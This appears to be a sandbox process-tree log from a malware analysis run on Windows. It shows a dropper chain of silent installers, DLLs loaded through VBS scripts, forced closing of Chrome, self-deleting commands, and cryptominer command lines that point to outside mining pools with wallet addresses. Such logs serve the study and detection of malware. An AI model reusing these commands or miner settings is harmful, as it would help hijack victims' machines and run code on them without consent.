C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 9484⤵
- Program crash
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 9324⤵
- Program crash
PID:7844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 10604⤵
- Program crash
PID:4440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 10844⤵
- Program crash
PID:4184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 11004⤵
- Program crash
PID:4196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 11244⤵
- Program crash
PID:408
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 12404⤵
- Program crash
PID:3232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 15324⤵
- Program crash
PID:8160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 15524⤵
- Program crash
PID:7584
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 17564⤵
- Program crash
PID:6660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 17204⤵
- Program crash
PID:4608
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 17764⤵
- Program crash
PID:7796
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 16804⤵
- Program crash
PID:7660
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5952
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5180
-
C:\Users\Admin\AppData\Local\Temp\is-QBNP0.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-QBNP0.tmp\LabPicV3.tmp" /SL5="$2027C,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\is-1J6B8.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-1J6B8.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:6928
-
C:\Users\Admin\AppData\Local\Temp\04-69a2b-257-21499-3f0dbc5864dfc\Lahypaekuwe.exe"C:\Users\Admin\AppData\Local\Temp\04-69a2b-257-21499-3f0dbc5864dfc\Lahypaekuwe.exe"6⤵PID:5148
-
-
C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe"C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe" /VERYSILENT6⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\is-1LOFC.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-1LOFC.tmp\prolab.tmp" /SL5="$304D0,575243,216576,C:\Program Files\Mozilla Firefox\COBJTCVVNW\prolab.exe" /VERYSILENT7⤵PID:6648
-
-
-
C:\Users\Admin\AppData\Local\Temp\09-3cc89-ef0-166a7-2e62fdb6709e0\ZHaelogicusy.exe"C:\Users\Admin\AppData\Local\Temp\09-3cc89-ef0-166a7-2e62fdb6709e0\ZHaelogicusy.exe"6⤵PID:5160
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exe & exit7⤵PID:7600
-
C:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\phnvwgw2.djv\md6_6ydj.exe8⤵PID:5640
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exe & exit7⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\4w4j2lju.zg2\askinstall31.exe8⤵PID:7444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe & exit7⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe8⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vl3e0yvg.mhb\toolspab1.exe9⤵PID:6664
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vkw4y1of.01z\GcleanerWW.exe /mixone & exit7⤵PID:5532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exe & exit7⤵PID:6936
-
C:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\0mm1cz30.jc0\setup_10.2_mix.exe8⤵PID:5504
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:6576
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exe & exit7⤵PID:5692
-
C:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exeC:\Users\Admin\AppData\Local\Temp\jaly0g0i.sa3\file.exe8⤵PID:7832
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 1 3.1617513448.60694be86bbec 10111⤵PID:8788
-
C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SVCSUC3AI2\multitimer.exe" 2 3.1617513448.60694be86bbec12⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\nlioyj5ct2s\app.exe"C:\Users\Admin\AppData\Local\Temp\nlioyj5ct2s\app.exe" /8-2313⤵PID:4684
-
-
C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe"C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe" /VERYSILENT /id=53513⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\is-NHMJU.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-NHMJU.tmp\vict.tmp" /SL5="$20868,870426,780800,C:\Users\Admin\AppData\Local\Temp\mnmirn5jqyn\vict.exe" /VERYSILENT /id=53514⤵PID:9176
-
-
-
C:\Users\Admin\AppData\Local\Temp\ciysk1dyruz\hasf2f040p1.exe"C:\Users\Admin\AppData\Local\Temp\ciysk1dyruz\hasf2f040p1.exe" /ustwo INSTALL13⤵PID:9508
-
-
C:\Users\Admin\AppData\Local\Temp\50uiequ031h\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\50uiequ031h\cpyrix.exe" /VERYSILENT13⤵PID:5836
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:9336
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:7564
-
-
-
C:\Users\Admin\AppData\Local\Temp\iumpw3jvlej\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\iumpw3jvlej\Setup3310.exe" /Verysilent /subid=57713⤵PID:9340
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe"C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe" ll10⤵PID:8624
-
C:\Users\Admin\AppData\Local\Temp\is-NORCH.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-NORCH.tmp\setups.tmp" /SL5="$505B6,635399,250368,C:\Users\Admin\AppData\Local\Temp\VQI9BW7A2H\setups.exe" ll11⤵PID:8880
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"9⤵PID:8956
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:3236
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:8196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:8856
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:8824
-
C:\Users\Admin\AppData\Roaming\6D24.tmp.exe"C:\Users\Admin\AppData\Roaming\6D24.tmp.exe"10⤵PID:8224
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:6124
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:6496
-
-
-
C:\Users\Admin\AppData\Roaming\B4AD.tmp.exe"C:\Users\Admin\AppData\Roaming\B4AD.tmp.exe"10⤵PID:7920
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:8608
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:8868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:9192
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exe /8-2222 & exit7⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exeC:\Users\Admin\AppData\Local\Temp\0mxzrqx1.uzs\app.exe /8-22228⤵PID:5672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exe & exit7⤵PID:8088
-
C:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exeC:\Users\Admin\AppData\Local\Temp\kivhkoxp.0me\Four.exe8⤵PID:6416
-
C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:7216
-
C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 1 3.1617513548.60694c4c66ef9 10410⤵PID:9732
-
C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\0NHTPN6X40\multitimer.exe" 2 3.1617513548.60694c4c66ef911⤵PID:10604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe"C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe" ll9⤵PID:2736
-
C:\Users\Admin\AppData\Local\Temp\is-FN35R.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-FN35R.tmp\setups.tmp" /SL5="$406CE,635399,250368,C:\Users\Admin\AppData\Local\Temp\PO37IIJV5N\setups.exe" ll10⤵PID:6684
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\is-BSMLF.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-BSMLF.tmp\lylal220.tmp" /SL5="$10522,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:6404
-
C:\Users\Admin\AppData\Local\Temp\is-3AUBM.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-3AUBM.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:6964
-
C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe"C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe" /VERYSILENT6⤵PID:5128
-
C:\Users\Admin\AppData\Local\Temp\is-IH3B8.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-IH3B8.tmp\irecord.tmp" /SL5="$2026A,6265333,408064,C:\Program Files\Windows Defender Advanced Threat Protection\JPYUBSRYZT\irecord.exe" /VERYSILENT7⤵PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\44-6b2a4-6ac-d7fbe-415bde322ee10\Kusamodihi.exe"C:\Users\Admin\AppData\Local\Temp\44-6b2a4-6ac-d7fbe-415bde322ee10\Kusamodihi.exe"6⤵PID:4548
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 23767⤵PID:5552
-
-
-
C:\Users\Admin\AppData\Local\Temp\4c-1d425-e19-636a3-988c798dcf9c7\Haetasheforu.exe"C:\Users\Admin\AppData\Local\Temp\4c-1d425-e19-636a3-988c798dcf9c7\Haetasheforu.exe"6⤵PID:4692
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exe & exit7⤵PID:6708
-
C:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\cyujfrkg.l0f\md6_6ydj.exe8⤵PID:5144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exe & exit7⤵PID:6912
-
C:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\q4zoao1r.d0l\askinstall31.exe8⤵PID:7336
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:7000
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:3436
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe & exit7⤵PID:4868
-
C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe8⤵PID:7760
-
C:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\fhmkxzxk.ehp\toolspab1.exe9⤵PID:4256
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb1nbw1t.3lk\GcleanerWW.exe /mixone & exit7⤵PID:6856
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exe & exit7⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\lrniyazd.hzf\setup_10.2_mix.exe8⤵PID:4796
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "9⤵PID:2224
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exe & exit7⤵PID:4720
-
C:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exeC:\Users\Admin\AppData\Local\Temp\m0zogzjj.vfz\file.exe8⤵PID:6476
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:7452
-
C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 1 3.1617513441.60694be1dc69d 10111⤵PID:7908
-
C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CUJ9MLWBRD\multitimer.exe" 2 3.1617513441.60694be1dc69d12⤵PID:6304
-
C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe" /Verysilent /subid=57713⤵PID:8920
-
C:\Users\Admin\AppData\Local\Temp\is-5EDN4.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5EDN4.tmp\Setup3310.tmp" /SL5="$605C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\0of4bu5oef3\Setup3310.exe" /Verysilent /subid=57714⤵PID:9432
-
C:\Users\Admin\AppData\Local\Temp\is-JSFC9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JSFC9.tmp\Setup.exe" /Verysilent15⤵PID:9172
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yvjbbxdwxac\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\yvjbbxdwxac\cpyrix.exe" /VERYSILENT13⤵PID:6908
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:10124
-
C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\efae2507-9670-45c6-a92f-9c632fd264e9\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run15⤵PID:7164
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:9208
-
-
-
C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe"C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe" /ustwo INSTALL13⤵PID:9444
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "kdzelueegsn.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\l03nd40ftwn\kdzelueegsn.exe" & exit14⤵PID:10412
-
-
-
C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe"C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe" /VERYSILENT /id=53513⤵PID:9504
-
C:\Users\Admin\AppData\Local\Temp\is-90A3G.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-90A3G.tmp\vict.tmp" /SL5="$207EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\o1bwsw5ooic\vict.exe" /VERYSILENT /id=53514⤵PID:9976
-
C:\Users\Admin\AppData\Local\Temp\is-GU4BC.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-GU4BC.tmp\win1host.exe" 53515⤵PID:9992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u04o4ymgzwp\app.exe"C:\Users\Admin\AppData\Local\Temp\u04o4ymgzwp\app.exe" /8-2313⤵PID:7996
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe"C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe" ll10⤵PID:8244
-
C:\Users\Admin\AppData\Local\Temp\is-RL651.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RL651.tmp\setups.tmp" /SL5="$B041A,635399,250368,C:\Users\Admin\AppData\Local\Temp\7TBAQO2NUF\setups.exe" ll11⤵PID:8544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"9⤵PID:8472
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:3552
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:7516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Full Program Features.exe"9⤵PID:4856
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:8988
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:8348
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"9⤵PID:7372
-
C:\Users\Admin\AppData\Roaming\AB46.tmp.exe"C:\Users\Admin\AppData\Roaming\AB46.tmp.exe"10⤵PID:7264
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:3520
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:2288
-
-
-
C:\Users\Admin\AppData\Roaming\F60B.tmp.exe"C:\Users\Admin\AppData\Roaming\F60B.tmp.exe"10⤵PID:5556
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX3\file.exe"10⤵PID:7072
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:6504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\md2_2efs.exe"9⤵PID:1684
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exe /8-2222 & exit7⤵PID:4420
-
C:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exeC:\Users\Admin\AppData\Local\Temp\sbsqzick.gil\app.exe /8-22228⤵PID:204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exe & exit7⤵PID:8932
-
C:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exeC:\Users\Admin\AppData\Local\Temp\ejojy0rt.iia\Four.exe8⤵PID:8128
-
C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:5800
-
C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 1 3.1617513547.60694c4b3e9d0 10410⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\QYPECRCKTX\multitimer.exe" 2 3.1617513547.60694c4b3e9d011⤵PID:10592
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe"C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe" ll9⤵PID:9012
-
C:\Users\Admin\AppData\Local\Temp\is-QNQGA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-QNQGA.tmp\setups.tmp" /SL5="$306D8,635399,250368,C:\Users\Admin\AppData\Local\Temp\DVBWMKZ55O\setups.exe" ll10⤵PID:8372
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:6184
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:5064
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:3492
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:6268
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:6344
-
C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 1 3.1617513256.60694b287366f 1035⤵PID:4260
-
C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\LU65KIDMW3\multitimer.exe" 2 3.1617513256.60694b287366f6⤵PID:4336
-
C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe" /Verysilent /subid=5777⤵PID:1948
-
C:\Users\Admin\AppData\Local\Temp\is-13A46.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-13A46.tmp\Setup3310.tmp" /SL5="$504FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\lpdkkpj2ieh\Setup3310.exe" /Verysilent /subid=5778⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\is-4HJT9.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4HJT9.tmp\Setup.exe" /Verysilent9⤵PID:7224
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"10⤵PID:6788
-
C:\Users\Admin\AppData\Local\Temp\is-M2OV6.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-M2OV6.tmp\lylal220.tmp" /SL5="$50528,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"11⤵PID:5804
-
C:\Users\Admin\AppData\Local\Temp\is-CC7D7.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-CC7D7.tmp\Microsoft.exe" /S /UID=lylal22012⤵PID:4820
-
